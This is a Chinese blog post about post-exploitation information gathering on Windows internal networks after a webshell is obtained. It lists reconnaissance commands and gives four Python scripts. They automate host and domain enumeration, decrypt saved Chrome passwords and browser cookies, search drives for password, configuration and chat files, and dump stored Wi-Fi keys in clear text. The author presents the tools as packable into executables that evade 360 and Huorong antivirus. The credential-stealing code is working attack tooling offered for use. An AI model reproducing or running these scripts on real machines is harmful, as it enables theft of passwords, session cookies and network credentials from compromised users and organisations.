内网信息收集(附脚本)

最新推荐文章于 2024-01-08 23:20:26 发布
最新推荐文章于 2024-01-08 23:20:26 发布
阅读量1.2k 收藏 4
点赞数 6
分类专栏: 内网 信息收集 安全工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43526443/article/details/120595533
版权

——D&X安全实验室

文中脚本已上传至github:https://github.com/Potato-py/getIntrInfo

可打包为可执行文件,可过360、火绒等

        渗透的本质就是信息收集,信息收集的深度与广度以及对关键信息的提取,影响了后续的方向和手法。

        当我们拿到webShell后,应该从内到外一步一步收集服务器信息、域信息以及环境信息等,从一个个细节中全面了解内网的部署。以下是总结的部分查询命令:

当前用户:

  whoami /all

网络信息:

  ipconfig /all

计算机版本/补丁编号:

  systeminfo

进程列表:

  tasklist

补丁信息:

  wmic qfe

系统信息:

  wmic os

机器运行信息:

  net statistics workstation

系统架构:

  set process

防火墙配置:

  netsh firewall show config

日志修改权限:

  wmic nteventlog get path,filename,writeable

当前在线用户:

  quser

本地用户:

  net user

本机管理员:

  net localgroup administrators

已安装软件信息:

  wmic product get name,version

杀软信息:

  WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe

端口信息:

  netstat -ano

路由信息:

  route print

arp信息:

  arp -a

host信息:

  type c:\Windows\system32\drivers\etc\hosts

wifi密码:

  netsh wlan show profile

计划任务:

  schtasks

自启服务:

  wmic startup get command, caption

已启服务:

  net start

本机服务:

  wmic service list brief

DNS服务器:

  nslookup

DNS缓存:

  ipconfig /displaydns

当前域信息:

  net config workstation

当前连接:

  net use

当前映射:

  net share

域环境:

  net view

定位域控:

  net group "domain controllers" /domain

域用户:

  net user /domain

域用户详情:

  wmic useraccount get /all

域用户密码策略:

  net accounts /domain

本地用户组信息:

  net localgroup

域用户组信息:

  net group /domain

域用户组成员:

  net "Domain users" /domain

域管理员用户组成员:

  net group "Enterprise Admins" /domain

域信任信息:

  nltest /domain_trusts

        以下脚本可用于辅助获取:

import os,sys
import csv

cmdList={
    #主机类
    "当前用户":"whoami /all",
    "网络信息":"ipconfig /all",
    "计算机版本/补丁编号":"systeminfo",
    "进程列表":"tasklist",
    "补丁信息":"wmic qfe",
    "系统信息":"wmic os",
    "机器运行信息":"net statistics workstation",
    "系统架构":"set process",
    "防火墙配置":"netsh firewall show config",
    "日志修改权限":"wmic nteventlog get path,filename,writeable",
    "当前在线用户":"quser",
    "本地用户":"net user",
    "本机管理员":"net localgroup administrators",
    "已安装软件信息":"wmic product get name,version",
    #杀软类
    "杀软信息":r"WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe",
    #网络类
    "端口信息":"netstat -ano",
    "路由信息":"route print",
    "arp信息":"arp -a",
    "host信息":"type c:\Windows\system32\drivers\etc\hosts",
    "wifi密码":"netsh wlan show profile",
    #计划任务类
    "计划任务":"schtasks",
    #服务类
    "自启服务":"wmic startup get command, caption",
    "已启服务":"net start",
    "本机服务":"wmic service list brief",
    #DNS服务
    "DNS服务器":"nslookup",
    "DNS缓存":"ipconfig /displaydns",
    "DNS服务器":"nslookup",
    #域信息
    "当前域信息":"net config workstation",
    "当前连接":"net use",
    "当前映射":"net share",
    "域环境":"net view",
    "定位域控":"net time",
    "定位域控":"net group \"domain controllers\" /domain",
    "域用户":"net user /domain",
    "域用户详情":"wmic useraccount get /all ",
    "域用户密码策略":"net accounts /domain",
    "本地用户组信息":"net localgroup",
    "域用户组信息":"net group /domain",
    "域用户组成员":"net \"Domain users\" /domain",
    "域管理员用户组成员":"net group \"Domain Admins\" /domain",
    "域管理员用户组成员":"net group \"Enterprise Admins\" /domain",
    "域信任信息":"nltest /domain_trusts",
}
choseList={}
    
def main():
    #可添加选择性执行,对应数据丢入choseList再执行
    #以下默认全部执行
    id=0
    for key,value in cmdList.items():
        id=id+1
        print('\n\n-------------%s-------------'%key)
        message = os.popen(value).read()
        print(message)
        csv_writer.writerow([ id, key, message])
    
if __name__ == "__main__":
    filename='./Result/hostInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        csv_writer.writerow([ 'ID','类型', '信息'])
        main()

 

        在我们内网渗透过程中没有头绪时,我们往往能通过一些出其不意的方式来获取一些渗透路径。

        通过获取浏览器书签、记录等信息来获取更多未知可渗透网络,通过获取浏览器Cookie以及存储的账号密码来获取Web端权限。以下脚本可用于辅助获取:

import os,sys
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import  datetime, timedelta
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
import browser_cookie3
import requests
import csv

#初始化地址
if 'win' in sys.platform:
    BookmarksPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Bookmarks') # 存在保存的书签
    localStatePath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Local State')# 存在AES加密密钥
    loginDataPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Login Data')# 存在保存的页面账号密码
    cookiesPath= os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Cookies')# 存在cookie
elif 'linux' in sys.platform:
    BookmarksPath = os.path.expanduser('~/.config/google-chrome/Default/Bookmarks')
    localStatePath = os.path.expanduser('~/.config/google-chrome/Local State')
    loginDataPath = os.path.expanduser('~/.config/chromium/Default/Login Data')
    cookiesPath = os.path.expanduser('~/.config/chromium/Default/Cookies')
else:#Mac
    BookmarksPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Bookmarks')
    localStatePath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Local State')
    loginDataPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Login Data')
    cookiesPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Cookies')


def getChromeTime(chromedate):  # 转换时间
    try:
        return str(datetime(1601, 1, 1) + timedelta(microseconds=chromedate))
    except:
        return ''

def getEncKey():    # 获取加密AESkey
    with open(localStatePath, "r", encoding="utf-8") as f:
        localStateTest = f.read()
        localState = json.loads(localStateTest)
    key = base64.b64decode(localState["os_crypt"]["encrypted_key"])[5:]
    return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]

#Chrome专属,可删除使用公用方法
def getDecCookie(encCookie):    # 获取解密后的Cookie
    if sys.platform == 'win32':
        try:
            if encCookie[:4] == b'x01x00x00x00':
                decCookie = dpapiDecrypt(encCookie)
                return decCookie.decode()
            elif encCookie[:3] == b'v10':
                decCookie = aesDecrypt(encCookie)
                return decCookie[:-16].decode()
        except WindowsError:
            return None
    else:
        raise WindowsError

#Chrome专属,可删除使用公用方法
def dpapiDecrypt(encCookie):   # 使用DPAPI解密
    import ctypes
    import ctypes.wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]

    p = ctypes.create_string_buffer(encCookie, len(encCookie))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result

#Chrome专属,可删除使用公用方法    
def aesDecrypt(encCookie):  # 使用AESkay解密
    key = getEncKey()
    nonce = encCookie[3:15]
    cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(encCookie[15:])

def decPassword(password, key): # 解密密码
    try:
        iv = password[3:15]
        password = password[15:]
        cipher = AES.new(key, AES.MODE_GCM, iv)
        return cipher.decrypt(password)[:-16].decode()
    except:
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except:
            return ""

def getPassword():  # 获取密码
    csv_writer.writerow([ 'ID','【Chrome】url地址', '账号','密码','最后使用时间'])
    key = getEncKey()
    filename = "chromeLoginData.db"
    # 创建新chrome数据库文件,防止正在运行导致数据库锁定
    shutil.copyfile(loginDataPath, filename)
    db = sqlite3.connect(filename)
    db.text_factory = str
    cursor = db.cursor()
    cursor.execute("select origin_url, username_value, password_value, date_last_used from logins order by date_created")
    id=0
    for row in cursor.fetchall():
        url = row[0]
        username = row[1]
        password = decPassword(row[2], key)
        dateLastUsed = row[3]        
        if username or password:
            id=id+1
            print("\nURL: "+url)
            print("Username: "+username)
            print("Password: "+password)
            print("Last Used: "+getChromeTime(dateLastUsed))
            csv_writer.writerow([ id, url, username,password,getChromeTime(dateLastUsed)])
        else:
            continue
    cursor.close()
    db.close()
    csv_writer.writerow(' ')
    try:
        os.remove(filename)
    except:
        pass

def formatCookiejar(cookiejar):  # 格式化cookiejar对象并打印
    cookieList = str(cookiejar)[12:-3].split(">, <")
    newCookieList=[]
    id=0
    for i in range(len(cookieList)):
        id=id+1
        host=cookieList[i].split(" for ")[1]
        name=cookieList[i].split("Cookie ")[1].split("=")[0]
        cookie=cookieList[i].split("=")[1].split(" for ")[0]
        print('\nHost: %s\nName: %s\nCookie: %s'%(host,name,cookie))
        csv_writer.writerow([ id, host, name, cookie])

def getCookie():    # 获取cookie
    try:
        chromeCookie = browser_cookie3.chrome()
        print('\n\n-------------Chrome浏览器Cookie如下:-------------')
        getChromeCookie()
    except:
        try:
            csv_writer.writerow([ 'ID','【Chrome】url地址', 'Name', 'Cookie'])
            formatCookiejar(chromeCookie)
            csv_writer.writerow(' ')
        except:
            chromeCookie = []
            csv_writer.writerow([ ' ','未检测到Chrome浏览器', ' ', ' '])
            csv_writer.writerow(' ')
            print('\n未检测到Chrome浏览器')
    try:
        firefoxCookie = browser_cookie3.firefox()
        csv_writer.writerow([ 'ID','【Firefox】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Firefox浏览器Cookie如下:-------------')
        formatCookiejar(firefoxCookie)
        csv_writer.writerow(' ')
    except:
        firefoxCookie = []
        csv_writer.writerow([ ' ','未检测到Firefox浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Firefox浏览器')
    try:
        operaCookie =  browser_cookie3.opera()
        csv_writer.writerow([ 'ID','【Opera】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Opera浏览器Cookie如下:-------------')
        formatCookiejar(operaCookie)
        csv_writer.writerow(' ')
    except:
        operaCookie = []
        csv_writer.writerow([ ' ','未检测到Opera浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Opera浏览器')
    try:
        edgeCookie =  browser_cookie3.edge()
        csv_writer.writerow([ 'ID','【Edge】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Edge浏览器Cookie如下:-------------')
        formatCookiejar(edgeCookie)
        csv_writer.writerow(' ')
    except:
        edgeCookie = []
        csv_writer.writerow([ ' ','未检测到Edge浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Edge浏览器')
    try:
        chromiumCookie =  browser_cookie3.chromium()
        csv_writer.writerow([ 'ID','【Chromium】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Chromium浏览器Cookie如下:-------------')
        formatCookiejar(chromiumCookie)
        csv_writer.writerow(' ')
    except:
        chromiumCookie = []
        csv_writer.writerow([ ' ','未检测到Chromium浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Chromium浏览器')

#Chrome专属,可删除使用公用方法
def getChromeCookie():    # 获取cookie
    filename = "chromeCookieData.db"
    shutil.copyfile(cookiesPath, filename)
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    cursor.execute("select host_key,path,name,encrypted_value,expires_utc from cookies")#需新版sqlite3,否则会报错encrypted_value无法转utf-8
    csv_writer.writerow([ 'ID','【Chrome】url地址', 'Path', 'Name', 'Cookie', '有效期'])
    id=0
    for row in cursor.fetchall():
        try:
            host = row[0]
            path = row[1]
            name = row[2]
            encrypted_value = row[3]
            expires_utc =getChromeTime(row[4])
            if  encrypted_value:
                id=id+1
                print("\nHost: "+host)
                print("Path: "+path)
                print("Name: "+name)
                try:
                    cookie=win32crypt.CryptUnprotectData(encrypted_value)[1].decode() # Chrome80.X版本前解密方式
                except Exception as e:
                    cookie=getDecCookie(encrypted_value) # Chrome80.X版本后解密方式
                print("Cookie: "+cookie)
                print("Expires: "+expires_utc)
                csv_writer.writerow([ id, host, path, name, cookie, expires_utc])
        except:
            continue
    cursor.close()
    db.close()
    csv_writer.writerow(' ')
    try:
        os.remove(filename)
    except:
        pass

def forBookmarks(itemData,id): # 循环书签数据
    for item in itemData:
        type = item['type']
        name = item['name']
        if type == 'url':
            id = id+1
            print('\nTitle: ',name, '\nUrl: ',item['url'])
            csv_writer.writerow([ id,name,item['url']])
        else:   # 文件夹
            forBookmarks(item['children'],id)


def getBookmarks(): # 获取书签
    csv_writer.writerow([ 'ID','【Chrome】书签名', 'url地址'])
    with open(BookmarksPath, 'r',encoding = "utf-8") as f:
        itemData=json.loads(f.read())['roots']['bookmark_bar']['children']
    id=0
    forBookmarks(itemData,id)
    csv_writer.writerow(' ')
    

def main():
    print('\n-------------Chrome浏览器书签如下:-------------')
    getBookmarks()
    
    print('\n\n-------------Chrome浏览器密码如下:-------------')
    getPassword()
    print('\n\n-------------各浏览器Cookie如下:-------------')
    getCookie()
    
if __name__ == "__main__":
    filename='./Result/bowserInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        main()

 

        通过遍历获取敏感文件,或者聊天文件,有可能存在Web控制台账号密码等敏感信息。以下脚本可用来辅助获取:

import os,sys
import csv

cmdList={
    "QQ文件":'dir /a /s /b "C:/Users/Administrator/Documents/Tencent Files/"|findstr "FileRecv.*\."',
    "微信文件":'dir /a /s /b "C:/Users/Administrator/Documents/WeChat Files/"|findstr "FileStorage.*\."',
    "下载文件":'dir /a /s /b "C:/Users/Administrator/Downloads"',
    "office数据库文件":'c: & dir /a /s /b "*.mdb" & d: & dir /a /s /b "*.mdb" & e: & dir /a /s /b "*.mdb"',
    "sql文件":'c: & dir /a /s /b "*.sql" & d: & dir /a /s /b "*.sql" & e: & dir /a /s /b "*.sql"',
    "虚拟光盘文件":'c: & dir /a /s /b "*.mdf" & d: & dir /a /s /b "*.mdf" & e: & dir /a /s /b "*.mdf"',
    "outlook电子邮件文件":'c: & dir /a /s /b "*.eml"',
    "outlook数据库文件":'c: & dir /a /s /b "*.pst"',
    "配置文件":'c: & dir /a /s /b "*.conf*" & d: & dir /a /s /b "*.conf*" & e: & dir /a /s /b "*.conf*"',
    "备份文件":'c: & dir /a /s /b "*bak*" & d: & dir /a /s /b "*bak*" & e: & dir /a /s /b "*bak*"',
    "密码文件":'c: & dir /a /s /b "*pwd*" & d: & dir /a /s /b "*pwd*" & e: & dir /a /s /b "*pwd*"',
    "密码文件":'c: & dir /a /s /b "*pass*" & d: & dir /a /s /b "*pass*" & e: & dir /a /s /b "*pass*"',
    #"登录文件":'c: & dir /a /s /b "*login*" & d: & dir /a /s /b "*login*" & e: & dir /a /s /b "*login*"',
    #"用户文件":'c: & dir /a /s /b "*user*" & d: & dir /a /s /b "*user*" & e: & dir /a /s /b "*user*"',
}
choseList={}
    
def main():
    #可添加选择性执行,对应数据丢入choseList再执行
    #以下默认全部执行
    #第一次运行比较慢,正常
    id=0
    for key,value in cmdList.items():
        id = id + 1
        print('\n\n-------------%s-------------'%key)
        message = os.popen(value).read()
        print(message)
        csv_writer.writerow([ id, key, message])
    #可以添加选择性读取某文件---我有。懒

if __name__ == "__main__":
    filename='./Result/sensitiveFile.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        csv_writer.writerow([ 'ID','类型', '路径'])
        main()

  

        通过获取Wifi账号密码,获得的足够多的密码样本来分析密码设置方式和使用习惯,从而进行针对性的攻击利用。以下脚本可用来辅助获取:

import os
import importlib,sys
import csv
importlib.reload(sys)
 
 
# 获取电脑连接过的所有wifi名称和密码
def checkWIFI():
    list = []
    # 获取所有的wifi名称
    message = os.popen('netsh wlan show profiles').readlines()
    print('正在解析中,请稍等……')
    for i in message:
        result = i.strip().encode().decode("utf-8")

        if result.find(u"所有用户配置文件 : ") != -1:
            command = 'netsh wlan show profiles name="' + result[11:] + '" key=clear'
            try:
                per_wifi = os.popen(command).readlines()
            except:
                per_wifi = []
            
            for j in per_wifi:
                passwd = j.strip().encode().decode("utf-8")
 
                if passwd.find(u"关键内容            :") != -1:# 密码字符串不为空时
                    if passwd[18:] != '':
                        list_temp = []
                        list_temp.append(result[11:])
                        list_temp.append(passwd[18:])
                        list.append(list_temp)
    return list

if __name__ == "__main__":
    list = checkWIFI()
    print("返回结果如下:")
    filename='./Result/conWifiInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        csv_writer.writerow([ 'ID','wifi名称', '密码'])
        i = 0
        for j in list:
            i = i + 1
            print(str(i) + "、wifi名称:" + j[0] + ",密码:" + j[1])
            csv_writer.writerow([ i, j[0], j[1]])

 

土豆.exe
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 10
    评论
专栏目录
爬虫browser_cookie3,让你爬数据更简单
蜗牛在奔跑的博客
01-02 3524
1.pip installbrowser_cookie3 ##python3 def cc(): import re import browser_cookie3 import requests get_title = lambda html: re.findall('<title>(.*?)</title>', html, flags=re.DOTALL)[0].strip() url = "https://msg.csdn.net.
【Python小技巧】browser_cookie3访问Chrome浏览器Cookies文件报错的解决办法
IT里的交易员-博客
06-27 3382
近期需要使用Chrome访问网页,并通过browser_cookie3需要提取其Cookie作为登录验证,之前113版本的Chrome浏览器写的代码都可以正常运行,但最近总是错误频发,总不能正常运行。甚是头疼。虽然解决方法很简单,过程中却经历了各种折腾,但也对浏览器、操作系统等有了更深的认识。尽管在程序调试中出现一下问题,但也证明Chrome浏览器在安全方面更强一些。另外就是解决问题就和解方程一样,一条路不通,可以换一条路。也许问题很快就可以解决!
python获取浏览器 cookies
LYR 的博客
07-07 2475
python 获取 cookie
获取Windows信息的批处理脚本
weixin_39445116的博客
11-30 86
此代码可以输出当前windows的详细信息到当前目录的System_detail中。
浏览器 cookie 限制
星星的故事
01-20 611
一、浏览器允许每个域名所包含的 cookie 数:Microsoft 指出 Internet Explorer 8 增加 cookie 限制为每个域名 50 个,但 IE7 似乎也允许每个域名 50 个 cookie(《Update to Internet Explorer’s Cookie Jar》)。 Firefox 每个域名 cookie 限制为 50 个。 Opera 每个
inlinux:内网渗透信息收集脚本
05-09
inlinux 内网渗透信息收集脚本
内网信息收集批处理脚本
01-05
内网信息收集批处理脚本.使用时请将后缀修改为bat
frp内网穿透工具,自动拉起脚本
10-24
frp内网穿透工具,frp服务端、客户端自动拉起脚本。 支持TCP,UDP,HTTP,HTTPS等协议类型。 适用情况:实现内网服务通过端口映射的方式暴露在公网环境里。要求:有一台有公网IP的服务器。
内网信息安全管理软件.doc
11-18
内网信息安全管理软件是针对企业内部网络环境设计的,旨在保障网络数据安全,防止非法入侵、信息泄露和内部滥用等问题。此类软件通常包含多个子系统,如可信网络监控、数据管理、网络认证和保密系统,以确保网络环境...
11内网信息收集11111111111
07-05
在IT安全领域,内网信息收集是网络安全防护的重要一环,尤其对于企业网络而言,确保内部网络的安全性至关重要。本文将详细探讨内网信息收集的相关知识点,并以端口扫描工具Fscan为例,介绍其在信息收集过程中的应用...
windows信息收集自动化脚本
qq_42529356的博客
02-14 738
import os #!encoding=utf-8 class information_collecting(object): def __init__(self): self.system_info_commands={'windows版本信息\n':'ver','windows系统信息\n':'systeminfo','wmic os list brief\n':'wmic os list brief'} self.process_info_command=
【网安神器篇】——wmic_info信息收集工具
热门推荐
Demo不是emo的博客
12-01 1万+
wmic_info自动化windows信息收集工具
windows CMD实现的信息收集工具
墨鱼菜鸡
03-27 119
bat1 @echo off echo ====================================================== echo [*] 所有盘符下的有趣文件 @For /F "Skip=1" %%i in ('Wmic Logicaldisk Where "DriveType=3" Get Name') Do cd %%i&&%%i&...
超级易懂的Windows信息收集指令来啦!!!集合一
最新发布
weixin_54475173的博客
01-08 695
windows信息收集指令一站式直达,收藏开箱即食
windows各类密码搜集
good good study
02-17 2848
从 Windows 2000 开始,用户程序或操作系统程序就可以直接调用 DPAPI 来加密数据。由于 DPAPI 简单易用且加密强大,大量应用程序都采用 DPAPI 加密用户的私密数据,如 Chrome 浏览器的自动登陆密码、远程桌面的自动登陆密码、Outlook邮箱的账号密码、加密文件系统的私钥等。DPAPI 内部加密流程异常复杂而且微软官方也未公布过其内部细节,这给理解该接口内部实现机制带来了极大困难。
内网信息收集
qq_33040633的博客
10-15 1279
内网信息收集(自动和手动)
从新获取jar_【爬虫】一个简单方便的获取cookie的python库
weixin_34002071的博客
01-13 554
前言很久之前学过一点点爬虫,前几天需要爬一点资料所以又捡起来了。算是小需求所以也没用太复杂的框架,就Requests+正则就 ok 了。遗憾的是,需要爬的目标站是那种登录才可以见全文的那种网站,所以我得想办法获取 cookie。网上搜了一下,比较简单的方法有两种,一种是直接查看登录后网站存储的 cookie,然后解析使用。另一种是构造一个登录函数,登录后再获取 cookie。前者最为...
[内网安全]四.内网信息收集--BloodHound工具与PowerShell工具的使用
PsgQ的博客
05-12 621
作为网络安全爱好者,对内网的渗透学习必不可少。因此从今天开始从零开始记录自己的内网学习过程,一方面是督促自己不断前行且学习新知识;另一方面是分享与读者,希望大家一起进步。这系列文章入门部分将参考徐焱老师的《内网安全攻防》这本书,并结合作者在安全牛课堂分享的学习讲解视频,且看且珍惜吧!督促自己完成每一个实验,把每一个细节搞懂,加油~ 文章目录域渗透分析工具BloodHound安装BloodHound所需环境1、下载安装JDK2、下载安装Neo4j3、启动Neo4j数据库服务端下载BloodHoundPower
内网信息收集(超级全)
yggcwhat
02-09 1364
内网信息收集 文章首发与奇安信攻防社区 https://forum.butian.net/share/236 简介 在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质量,所以信息收集的重要性不容小觑,看得懂并不代表会,不如自己实操一遍,这里将提供一个单域的环境下载地址,进行信息收集。 单域环境 这张图为这次信息收集所搭建的单域内网环境。 工作组与域环境比较 工作组是一群计算机的集合,它仅仅是一个逻辑的集合,各自计算机还是各自管理的,你要访问其中的计算机,还是要
内网渗透实战:信息收集与常用工具解析
内网渗透流程与思路和工具讲解是一门深入研究的信息安全技术,它关注的是如何通过合法或非法手段评估内部网络的安全状况,以发现潜在漏洞。以下是关于内网渗透的核心知识点: 1. **内网渗透流程**: - **阶段一:...
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

土豆.exe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值